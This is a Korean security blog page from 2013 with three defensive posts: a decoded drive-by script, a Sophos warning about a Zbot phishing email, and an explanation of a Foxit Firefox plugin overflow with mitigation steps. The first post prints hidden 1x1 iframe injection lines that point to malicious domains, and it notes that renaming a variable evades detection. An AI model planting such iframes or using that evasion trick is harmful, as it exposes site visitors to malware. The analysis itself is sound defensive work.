Decode 를 해보면 연결되는 사이트는 다음과 같다 !


document.write('<iframe src="http://vnbuyta.co.be/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')


=========================

Server IP(s):

0.0.0.0

=========================


document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')


=========================

Server IP(s):

0.0.0.0

=========================


document.write('<iframe src="http://locumresources.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')


=========================

Server IP(s):

0.0.0.0

=========================


해당 사이트들은 현재 접속이 되고 있지 않다 !


하지만 스크립트를 보면서 조금만 문구를 변경하여도 못잡는것이 마음이 안타까웠다.....

문구를 var t -> var x 로 바꾸면 진단 못하는게 너무 허무하기도 하고 안타깝기도 했다.

역시 최선은 사용자가 접속하기 전에 미리 차단을 해버리는것이 제일 사용자를 지키는 일인거 같다!


댓글을 달아 주세요

posted by Kwan's 2013. 1. 22. 18:45


소포스랩은 보안 메시지처럼 가장하여 이메일을 통해 스팸메일로 보내진 광범위한 맬웨어 공격을 차단하고 있습니다.

“보안 메시지가 도착했습니다.”라는 제목을 가진 그 이메일은 수신인을 속여 첨부된 ZIP파일을 열도록 합니다.

하지만, <securedoc.zip>이란 ZIP파일에 포함된 것은 소포스 제품이 Troj/Zbot-DPM로 감지하는 트로이목마입니다.

다음은 전형적인 메시지를 보여줍니다.(전체 버전을 보시려면 이미지를 클릭하세요.)

보안 메시지가 도착했습니다.

SECUREDOC이란 첨부파일을 열어서 보안 메시지를 읽어주세요.여러분은 그 파일을 열거나 여러분의 컴퓨터에 다운로드 하게 될 것입니다. 제일 좋은 방법은, 우선 그 파일을 다운로드한 다음에 그 파일을 여는겁니다.

이 메시지의 타당성에 대해 걱정한다면, 발신인에게 직접 연락하세요.
Key 이메일 암호화 서비스에 대한 문의사항이 있으시면, 기술지원 888.764.7941로 연락하세요.

처음 사용자 - 첨부파일을 연 다음 등록을 하셔야 합니다.
Help - https://mailsafe.keybank.com/websafe/help?topic=RegEnvelope
아이언포트 암호화(IronPort Encryption)란 - https://mailsafe.keybank.com/websafe/about

Zeus라고도 알려진 악명 높은 Zbot 계열의 맬웨어는 여러분의 컴퓨터를 하이재킹하여 범죄용 봇넷의 일부로 만들 수 있습니다. 지난 몇 년간 사이버범죄자들은 서로 다른 버전의 Zbot을 사용하여 온라인 뱅킹 계좌에서 돈을 훔치고, 소셜 네트워킹 사이트의 로그인 정보와 이메일/FTP 정보 등을 훔쳤습니다.

수신인들이 왜 위에 보여준 것과 같은 보안 메시지를 실제 받았다고 믿게 되는지, 그리고 어리석게도 그 첨부파일을 열어서 그 안에 포함된 악성 실행파일을 실행시키게 되는지 이해하는 것은 쉽습니다.

현재 소포스랩은 이와 같은 메시지들이 스팸메일로 많이 보내지고 있는 것을 보고 있습니다. 그래서 여러분이 안티스팸이나 안티바이러스 제품이 업데이트되었는지, 그리고 이런 위협을 감지할 수 있는지 확인하길 바랍니다.

그리고 확인되지 않은 이메일 첨부파일을 열기 전에는 항상 주의 하시기 바랍니다.

댓글을 달아 주세요

posted by Kwan's 2013. 1. 15. 18:57


PDF 취약성과 익스플로잇에 대해 생각할 때, 가장 먼저 떠오르는 단어는 아마도 Adobe일 겁니다.

그 이유는 Adobe PDF 리더가 오랜 시간 동안 시장에서 가장 널리 사용되는 제품이었고 공격자와 연구원들에게 가장 많은 타깃이 되어왔기 때문입니다.

하지만 PDF 소프트웨어 시장에는 수많은 도전자들이 있는데, 다만 “다른 점”은 스스로 보안을 운영하기에는 충분하지 않다는 것을 명심하십시오.

또한, Adobe가 자체 보안에 중점을 둔 sandbox 기능이 있는 Reader X를 출시했기 때문에, 사기꾼들과 연구원들은 Adobe PDF가 크랙하기에 훨씬 더 힘들다는 것을 알게 된 것 같습니다.

그래서 여러분은 다른 PDF 소프트웨어 벤더들이 아마도 지난 수년 동안 전적으로 Adobe를 목표로 해왔을 거라는 열의를 좀 느끼기 시작하였다는 것을 예상할 수 있습니다.

여기 한가지 예가 있습니다. 이탈리아 보안 연구원 안드레아 미켈리치(Andrea Micalizzi)는 최근에 Firefox용 최신 Foxit PDF 플러그인에서 익스플로잇 가능성이 있는 취약점을 발견하게 되었습니다.

사실 미켈리치가 기술검증(proof-of-concept)용 익스플로잇을 만들었던 것은 아니지만, 저는 그의 익스플로잇을 마음대로 복제할 수 있었습니다.
(전 Windows XP3에 Foxit 플러그인 2.2.1.530이 설치된 Firefox 18.0을 사용하였습니다.)

스택 오버플로우(stack overflow)의 부작용인 충돌(crash)은 여러분이 선택한 메모리 영역을 거의다 쓰는 것입니다, 그것은 좋지 않습니다.

Foxit은 공개적으로 그들의 PDF 리더를 “악성 바이러스에 대한 걱정 없이 사용함을 보장[sic]”하는 안전한 플랫폼으로 홍보하고 있는데, 그것은 미켈리치가 발견한 버그에도 불구하고 대담한 진술처럼 들립니다.

하지만 Foxit의 주장에는 여전히 말 그대로의 진실이 있습니다.: 그 버그가 PDF 리더 자체에 있는 것이 아니라 브라우저와 리더간에 접착제처럼 행동하는 npFoxitReaderPlugin.dll이란 파일 안에 있기 때문입니다.

→ 파일명 앞의 np는 Netscape Navigator가 활기를 띄던 시절에 생겨났던 플러그인 아키텍쳐인 “Netscape Plugin”을 뜻합니다. 아이러니하게도, 그런 Netscape용 플러그인의 첫번째 예가 Adobe Systems에 사용되었습니다.

흥미롭게도, 여러분은 충돌(crash)을 유발시키기 위해 PDF를 Foxit에 넣을 필요는 없습니다. 단지 클릭할 때, 스스로 PDF라고 광고하는 HTTP reply를 제공하는 악의적인 링크를 Foxit에 넣어주기만 하면 됩니다.

버퍼 오버플로우는 링크를 처리하는 코드 안에서 발생하는데, 링크가 매우 긴 쿼리문(overly-long query string)을 포함하고 있을 때 충돌을 유발합니다.

만약 링크에 물음표[?]가 포함되어 있다면, 쿼리는 그 다음에 나오는 구문입니다. 쿼리 구성요소는 보통 server-side script에 종속된 파라미터를 확인하기 위해 사용됩니다. 아래 예문에서, 쿼리부분은 download=true 문자열입니다.

http://example.org/docs/file.pdf?download=true

비록 곧 그렇게 하겠지만, Foxit은 보안 경보(security advisories)에서 이 이슈에 대해 언급을 해야 합니다.

온라인에 올라온 이야기들을 봤는데, 아직 패치가 없기 때문에 다른 PDF 리더로 바꾸는 것을 고려해야 할 것입니다.

하지만 그 버그가 리더 자체에 있는 것이 아니기 때문에(어째든 아직 어떤 익스플로잇도 없어서), 여러분이 사용할 수 있는 더 빠르고 더 단순한 피해 완화방법은 Foxit을 고수하는 것일 겁니다.

다만 Firefox 플러그인을 사용하지 마세요.

Firefox 메뉴에서 Tools|Add-ons로 가서, Plugins을 선택하고 Foxit Reader Plugin for Mozilla 에 대한 Disable 버튼을 클릭하세요.

PDF파일은 더 이상 여러분의 브라우저 안에서 직접 열리지 않고, 여러분은 중간에 다음과 같은 대화상자를 보게 될 겁니다.

You have chosen to open: . . .

그리고 나면 여러분은 OK 버튼을 눌러야 합니다.

이것은 플러그인 DLL안에 있는 버그 코드를 피하면서, 분리된 Foxit 리더 프로세스안에 파일을 로드합니다.

스티브 잡스가 말했듯이, 그것은 그리 큰 문제는 아닙니다.

댓글을 달아 주세요